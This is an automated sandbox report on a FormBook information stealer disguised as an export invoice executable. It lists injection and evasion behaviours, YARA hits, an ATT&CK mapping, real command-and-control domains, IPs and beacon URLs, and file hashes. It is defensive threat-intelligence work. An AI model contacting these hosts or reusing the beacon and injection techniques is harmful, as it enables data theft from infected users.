          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502233 Sample: EXPORT INVOICE 2021.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.zoipartner.com 2->31 33 www.sosibibyslot.space 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 6 other signatures 2->47 11 EXPORT INVOICE 2021.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...XPORT INVOICE 2021.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 EXPORT INVOICE 2021.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 ratqueen.art 51.161.86.13, 49778, 80 OVHFR Canada 18->35 37 www.piedmontpines.school 209.17.116.165, 49780, 80 DEFENSE-NETUS United States 18->37 39 3 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cmstp.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          EXPORT INVOICE 2021.exe33%VirustotalBrowse
          EXPORT INVOICE 2021.exe17%MetadefenderBrowse
          EXPORT INVOICE 2021.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.EXPORT INVOICE 2021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.vulcanopresale.icu/mqi9/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa0%Avira URL Cloudsafe
          http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ratqueen.art
          51.161.86.13
          truetrue
            unknown
            www.piedmontpines.school
            209.17.116.165
            truetrue
              unknown
              www.kalitelihavaperdesi.com
              unknown
              unknowntrue
                unknown
                www.sosibibyslot.space
                unknown
                unknowntrue
                  unknown
                  www.zoipartner.com
                  unknown
                  unknowntrue
                    unknown
                    www.ratqueen.art
                    unknown
                    unknowntrue
                      unknown
                      www.yuezhong66.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        www.vulcanopresale.icu/mqi9/true
                        • Avira URL Cloud: safe
                        low
                        http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLatrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBwtrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.founder.com.cn/cnEXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        51.161.86.13
                        ratqueen.artCanada
                        16276OVHFRtrue
                        209.17.116.165
                        www.piedmontpines.schoolUnited States
                        55002DEFENSE-NETUStrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:502233
                        Start date:13.10.2021
                        Start time:18:20:09
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 48s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:EXPORT INVOICE 2021.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/1@10/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 26% (good quality ratio 22.8%)
                        • Quality average: 71.1%
                        • Quality standard deviation: 33.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 40.91.76.224, 131.253.33.200, 13.107.22.200, 20.82.209.183, 95.100.218.79, 93.184.221.240, 20.82.210.154, 2.20.178.33, 2.20.178.24
                        • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, validation-v2.sls.microsoft.com, arc.msn.com, wu.azureedge.net, dual-a-0001.dc-msedge.net, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, validation-v2.sls.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        18:21:35API Interceptor1x Sleep call for process: EXPORT INVOICE 2021.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        51.161.86.13b5WjxiOqab.exeGet hashmaliciousBrowse
                        • www.scottgesslerdesign.com/jzvu/?9rq=mRzEKZUdaNl7ltH3Zt23PFVFKBVOmJl5lI4ImGRT+4jF8hnHGhoZT0nVqsAmeIAJc4K10Wg3ow==&4h=vZR8NxdxOD6xzn

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        OVHFRSecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.21879.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        Sales_Receipt 6310.xlsGet hashmaliciousBrowse
                        • 51.83.3.52
                        Purchase_Order 2586.xlsGet hashmaliciousBrowse
                        • 51.83.3.52
                        D9MmQDM0jJ.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        A76JJinZL9.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        8QijkUFTSB.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        HsGBdHtLk2.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        lPzE2YbyzV.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        enVuNPtSQE.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        REQUIREMENT.exeGet hashmaliciousBrowse
                        • 51.77.52.109
                        DEFENSE-NETUSxHSUX1VjKN.exeGet hashmaliciousBrowse
                        • 206.188.193.204
                        DEUXRWq2W8.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO08485.xlsxGet hashmaliciousBrowse
                        • 206.188.193.204
                        KYTransactionServer.exeGet hashmaliciousBrowse
                        • 206.188.192.207
                        doc_0862413890.exeGet hashmaliciousBrowse
                        • 206.188.193.172
                        PO08485.xlsxGet hashmaliciousBrowse
                        • 206.188.193.204
                        5Zebq6UNKC.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        Lv9eznkydx.exeGet hashmaliciousBrowse
                        • 205.178.189.129
                        x86_64-20211007-1619Get hashmaliciousBrowse
                        • 170.158.122.60
                        BILL OF LADING.exeGet hashmaliciousBrowse
                        • 206.188.198.65
                        2WK7SGkGVZ.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO20211006.docGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO_A9164.EXEGet hashmaliciousBrowse
                        • 209.17.116.163
                        oHdx7w2YXC.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        fmcg.xlsxGet hashmaliciousBrowse
                        • 209.17.116.163
                        M0y2otz1JB.exeGet hashmaliciousBrowse
                        • 206.188.197.227
                        jnnbbMX9Ch.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        3KJ2ZgV4so.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        cFjtsk0IBh.exeGet hashmaliciousBrowse
                        • 206.188.197.227
                        cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                        • 206.188.193.146

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.log
                        Process:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.068386623253211
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:EXPORT INVOICE 2021.exe
                        File size:840704
                        MD5:54bb8fbbfe0a665ca59579a0240ce2f0
                        SHA1:0b97e4463c76df4541179880902bb6966ef3f894
                        SHA256:3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
                        SHA512:fd6ac3075702fffd66df3566015bd6b2d844f28f0dfc0c638bd9198479514479514cf506bfdd56a671efa233873f9313a8b36d80e0bcb78a88624abd9f9b5770
                        SSDEEP:12288:Y+zIPiLYQkt3iJHGmWG3HhY8muu8Rsni2U1Rr6s5yuuETV/O:Y+zWiLYQZaGXhguu8ai2U
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.fa..............P.............n.... ........@.. .......................@............@................................

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4ce86e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6166C74F [Wed Oct 13 11:47:27 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xce81c0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x5b8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
